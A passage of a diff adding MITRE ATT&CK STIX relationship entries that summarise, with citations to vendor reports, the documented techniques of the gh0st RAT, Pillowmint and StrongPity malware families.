"malware--88c621a7-aef9-4ae0-94e3-1fc87123eb24", + "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4", + "external_references": [ + { + "source_name": "Gh0stRAT ATT March 2019", + "url": "https://cybersecurity.att.com/blogs/labs-research/the-odd-case-of-a-gh0strat-variant", + "description": "Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020." + } + ], + "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) can execute its service if the Service key exists. If the key does not exist, [gh0st RAT](https://attack.mitre.org/software/S0032) will create and run the service.(Citation: Gh0stRAT ATT March 2019)", + "relationship_type": "uses", + "id": "relationship--6397d645-207c-4d1b-9a65-5f1b69a84e7c", + "type": "relationship", + "modified": "2020-07-24T13:48:49.763Z", + "created": "2020-07-24T13:48:49.763Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--88c621a7-aef9-4ae0-94e3-1fc87123eb24", + "target_ref": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65", + "external_references": [ + { + "source_name": "Gh0stRAT ATT March 2019", + "url": "https://cybersecurity.att.com/blogs/labs-research/the-odd-case-of-a-gh0strat-variant", + "description": "Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020." + } + ], + "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) can load DLLs into memory.(Citation: Gh0stRAT ATT March 2019)", + "relationship_type": "uses", + "id": "relationship--02d4ee3d-adb9-49fc-8e91-3379c508692b", + "type": "relationship", + "modified": "2020-07-24T13:48:49.761Z", + "created": "2020-07-24T13:48:49.761Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bd7a9e13-69fa-4243-a5e5-04326a63f9f2", + "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "external_references": [ + { + "source_name": "Trustwave Pillowmint June 2020", + "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/", + "description": "Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7\u2019s Monkey Thief . Retrieved July 27, 2020." + } + ], + "description": "[Pillowmint](https://attack.mitre.org/software/S0517) can iterate through running processes every six seconds collecting a list of processes to capture from later.(Citation: Trustwave Pillowmint June 2020)\t", + "relationship_type": "uses", + "id": "relationship--8977c8db-64e4-44b5-bee9-362779624a42", + "type": "relationship", + "modified": "2020-10-02T17:23:24.467Z", + "created": "2020-07-27T15:20:50.273Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bd7a9e13-69fa-4243-a5e5-04326a63f9f2", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "external_references": [ + { + "source_name": "Trustwave Pillowmint June 2020", + "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/", + "description": "Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7\u2019s Monkey Thief . Retrieved July 27, 2020." + } + ], + "description": "[Pillowmint](https://attack.mitre.org/software/S0517) has been compressed and stored within a registry key. [Pillowmint](https://attack.mitre.org/software/S0517) has also obfuscated the AES key used for encryption.(Citation: Trustwave Pillowmint June 2020)\t", + "relationship_type": "uses", + "id": "relationship--426db174-3cc4-4f9c-ae34-6398a86ec3bd", + "type": "relationship", + "modified": "2020-10-06T17:25:07.403Z", + "created": "2020-07-27T15:20:50.270Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bd7a9e13-69fa-4243-a5e5-04326a63f9f2", + "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "external_references": [ + { + "source_name": "Trustwave Pillowmint June 2020", + "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/", + "description": "Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7\u2019s Monkey Thief . Retrieved July 27, 2020." + } + ], + "description": "[Pillowmint](https://attack.mitre.org/software/S0517) has been decompressed by included shellcode prior to being launched.(Citation: Trustwave Pillowmint June 2020)\t", + "relationship_type": "uses", + "id": "relationship--abece522-51dc-4904-b0f9-585db7fb0223", + "type": "relationship", + "modified": "2020-10-02T17:23:24.487Z", + "created": "2020-07-27T15:20:50.275Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bd7a9e13-69fa-4243-a5e5-04326a63f9f2", + "target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", + "external_references": [ + { + "source_name": "Trustwave Pillowmint June 2020", + "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/", + "description": "Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7\u2019s Monkey Thief . Retrieved July 27, 2020." + } + ], + "description": "[Pillowmint](https://attack.mitre.org/software/S0517) has encrypted stolen credit card information with AES and further encoded it with Base64.(Citation: Trustwave Pillowmint June 2020)\t", + "relationship_type": "uses", + "id": "relationship--efea6d26-7372-45bb-81bb-1e300abd5b13", + "type": "relationship", + "modified": "2020-10-02T17:23:24.481Z", + "created": "2020-07-27T15:20:50.286Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bd7a9e13-69fa-4243-a5e5-04326a63f9f2", + "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4", + "external_references": [ + { + "source_name": "Trustwave Pillowmint June 2020", + "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/", + "description": "Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7\u2019s Monkey Thief . Retrieved July 27, 2020." + } + ], + "description": "[Pillowmint](https://attack.mitre.org/software/S0517) has stored its malicious payload in the registry key HKLM\\SOFTWARE\\Microsoft\\DRM.(Citation: Trustwave Pillowmint June 2020)", + "relationship_type": "uses", + "id": "relationship--332ce4cd-311a-457f-ae10-6d8e3ef7bc77", + "type": "relationship", + "modified": "2020-10-02T17:23:24.568Z", + "created": "2020-07-27T15:20:50.519Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bd7a9e13-69fa-4243-a5e5-04326a63f9f2", + "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", + "external_references": [ + { + "source_name": "Trustwave Pillowmint June 2020", + "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/", + "description": "Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7\u2019s Monkey Thief . Retrieved July 27, 2020." + } + ], + "description": "[Pillowmint](https://attack.mitre.org/software/S0517) has used multiple native Windows APIs to execute and conduct process injections.(Citation: Trustwave Pillowmint June 2020)", + "relationship_type": "uses", + "id": "relationship--9ac9325d-067d-4936-9c8d-159e21bd04c4", + "type": "relationship", + "modified": "2020-10-02T17:23:24.572Z", + "created": "2020-07-27T15:20:50.521Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bd7a9e13-69fa-4243-a5e5-04326a63f9f2", + "target_ref": "attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83", + "external_references": [ + { + "source_name": "Trustwave Pillowmint June 2020", + "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/", + "description": "Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7\u2019s Monkey Thief . Retrieved July 27, 2020." + } + ], + "description": "[Pillowmint](https://attack.mitre.org/software/S0517) has used a malicious shim database to maintain persistence.(Citation: Trustwave Pillowmint June 2020)", + "relationship_type": "uses", + "id": "relationship--09896887-98ee-4e8a-9cc2-4203b3b561c8", + "type": "relationship", + "modified": "2020-10-02T17:23:24.564Z", + "created": "2020-07-27T15:20:50.525Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bd7a9e13-69fa-4243-a5e5-04326a63f9f2", + "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", + "external_references": [ + { + "source_name": "Trustwave Pillowmint June 2020", + "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/", + "description": "Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7\u2019s Monkey Thief . Retrieved July 27, 2020." + } + ], + "description": "[Pillowmint](https://attack.mitre.org/software/S0517) has used a PowerShell script to install a shim database.(Citation: Trustwave Pillowmint June 2020)\t", + "relationship_type": "uses", + "id": "relationship--a8a65990-8385-440b-8733-940a69b05f4e", + "type": "relationship", + "modified": "2020-10-02T17:23:24.572Z", + "created": "2020-07-27T15:20:50.522Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + } + ], + "description": "[StrongPity](https://attack.mitre.org/software/S0491) can parse the hard drive on a compromised host to identify specific file extensions.(Citation: Talos Promethium June 2020)", + "relationship_type": "uses", + "id": "relationship--8e08658c-78f5-4bd5-a6e8-d74200ed776c", + "type": "relationship", + "modified": "2020-07-27T17:47:34.013Z", + "created": "2020-07-27T15:21:26.239Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + } + ], + "description": "[StrongPity](https://attack.mitre.org/software/S0491) can add directories used by the malware to the Windows Defender exclusions list to prevent detection.(Citation: Talos Promethium June 2020)", + "relationship_type": "uses", + "id": "relationship--5ca05cbf-6a28-4a6a-9d6c-e2b8331b2965", + "type": "relationship", + "modified": "2020-07-27T15:48:13.276Z", + "created": "2020-07-27T15:21:26.243Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + } + ], + "description": "[StrongPity](https://attack.mitre.org/software/S0491) has been bundled with legitimate software installation files for disguise.(Citation: Talos Promethium June 2020)", + "relationship_type": "uses", + "id": "relationship--f2502637-0d4a-4b94-928d-1f140f2d0ba1", + "type": "relationship", + "modified": "2020-07-30T14:04:59.198Z", + "created": "2020-07-27T15:21:26.253Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + }, + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + } + ], + "description": "[StrongPity](https://attack.mitre.org/software/S0491) has been executed via compromised installation files for legitimate software including compression applications, security software, browsers, file recovery applications, and other tools and utilities.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)", + "relationship_type": "uses", + "id": "relationship--6a552e69-29f1-4acc-8bd2-1f32d7550443", + "type": "relationship", + "modified": "2020-07-27T18:45:39.533Z", + "created": "2020-07-27T15:21:26.254Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + } + ], + "description": "[StrongPity](https://attack.mitre.org/software/S0491) can use PowerShell to add files to the Windows Defender exclusions list.(Citation: Talos Promethium June 2020)", + "relationship_type": "uses", + "id": "relationship--93c02dec-e63e-4437-809c-dc99e82d177d", + "type": "relationship", + "modified": "2020-07-27T15:48:13.209Z", + "created": "2020-07-27T15:48:13.209Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + } + ], + "description": "[StrongPity](https://attack.mitre.org/software/S0491) can identify if ESET or BitDefender antivirus are installed before dropping its payload.(Citation: Talos Promethium June 2020)", + "relationship_type": "uses", + "id": "relationship--7e32a557-f724-433f-84e0-756e14db7074", + "type": "relationship", + "modified": "2020-07-27T15:48:13.235Z", + "created": "2020-07-27T15:48:13.235Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + } + ], + "description": "[StrongPity](https://attack.mitre.org/software/S0491) has created new services and modified existing services for persistence.(Citation: Talos Promethium June 2020)", + "relationship_type": "uses", + "id": "relationship--9f751d66-0604-4d30-a820-022a8c90e870", + "type": "relationship", + "modified": "2020-07-31T13:05:30.850Z", + "created": "2020-07-27T15:48:13.242Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", + "external_references": [ + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + } + ], + "description": "[StrongPity](https://attack.mitre.org/software/S0491) has been signed with self-signed certificates.(Citation: Bitdefender StrongPity June 2020)", + "relationship_type": "uses", + "id": "relationship--e9a0006e-1667-4407-a451-47a4409b90f3", + "type": "relationship", + "modified": "2020-07-30T14:22:13.033Z", + "created": "2020-07-27T15:48:13.252Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + } + ], + "description": "[StrongPity](https://attack.mitre.org/software/S0491) can use the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run Registry key for persistence.(Citation: Talos Promethium June 2020)", + "relationship_type": "uses", + "id": "relationship--d5e9478c-439e-4ec5-8317-6d769dedc68a", + "type": "relationship", + "modified": "2020-07-27T15:48:13.246Z", + "created": "2020-07-27T15:48:13.246Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + }, + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + } + ], + "description": "[StrongPity](https://attack.mitre.org/software/S0491) can use HTTP and HTTPS in C2 communications.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)", + "relationship_type": "uses", + "id": "relationship--6e06ca98-ec9a-4175-a154-4d4f1394774b", + "type": "relationship", + "modified": "2020-07-27T18:55:17.711Z", + "created": "2020-07-27T15:48:13.253Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + }, + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + } + ], + "description": "[StrongPity](https://attack.mitre.org/software/S0491) can install a service to execute itself as a service.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)", + "relationship_type": "uses", + "id": "relationship--e7b10c00-0860-4592-a72c-e14e993e972b", + "type": "relationship", + "modified": "2020-07-28T17:25:25.651Z", + "created": "2020-07-27T16:04:39.467Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + } + ], + "description": "[StrongPity](https://attack.mitre.org/software/S0491) has the ability to hide the console window for its document search module from the user.(Citation: Talos Promethium June 2020)", + "relationship_type": "uses", + "id": "relationship--1248ffe0-ad3b-43a6-a358-763d8eab7fba", + "type": "relationship", + "modified": "2020-07-27T17:47:33.949Z", + "created": "2020-07-27T17:47:33.949Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + }, + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + } + ], + "description": "[StrongPity](https://attack.mitre.org/software/S0491) can compress and encrypt archived files into multiple .sft files with a repeated xor encryption scheme.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)", + "relationship_type": "uses", + "id": "relationship--3ad041f8-30ca-44bb-bad5-2e5b3e5d6242", + "type": "relationship", + "modified": "2020-07-30T14:22:13.038Z", + "created": "2020-07-27T17:47:33.969Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + } + ], + "description": "[StrongPity](https://attack.mitre.org/software/S0491) can identify the hard disk volume serial number on a compromised host.(Citation: Talos Promethium June 2020)", + "relationship_type": "uses", + "id": "relationship--a6b41bba-0b47-400d-9aa4-134b4f47994f", + "type": "relationship", + "modified": "2020-07-30T14:22:13.043Z", + "created": "2020-07-27T17:47:33.983Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + }, + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + } + ], + "description": "[StrongPity](https://attack.mitre.org/software/S0491) can automatically exfiltrate collected documents to the C2 server.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)", + "relationship_type": "uses", + "id": "relationship--0e3ea008-1a5e-4f58-aaa9-4da690539908", + "type": "relationship", + "modified": "2020-08-10T19:52:05.912Z", + "created": "2020-07-27T17:47:34.023Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + }, + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + } + ], + "description": "[StrongPity](https://attack.mitre.org/software/S0491) can exfiltrate collected documents through C2 channels.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)", + "relationship_type": "uses", + "id": "relationship--354fe9c0-2b9b-43f9-98a0-ae0ee1515d4d", + "type": "relationship", + "modified": "2020-07-27T18:55:17.727Z", + "created": "2020-07-27T17:47:34.017Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + } + ], + "description": "[StrongPity](https://attack.mitre.org/software/S0491) can determine if a user is logged in by checking to see if explorer.exe is running.(Citation: Talos Promethium June 2020)", + "relationship_type": "uses", + "id": "relationship--de0ee6e1-6b97-40be-b036-5339db13e6e4", + "type": "relationship", + "modified": "2020-07-27T17:47:34.029Z", + "created": "2020-07-27T17:47:34.029Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + } + ], + "description": "[StrongPity](https://attack.mitre.org/software/S0491) can identify the IP address of a compromised host.(Citation: Talos Promethium June 2020)", + "relationship_type": "uses", + "id": "relationship--35178b99-6830-4150-a094-691888655525", + "type": "relationship", + "modified": "2020-07-27T18:45:39.466Z", + "created": "2020-07-27T18:45:39.466Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": 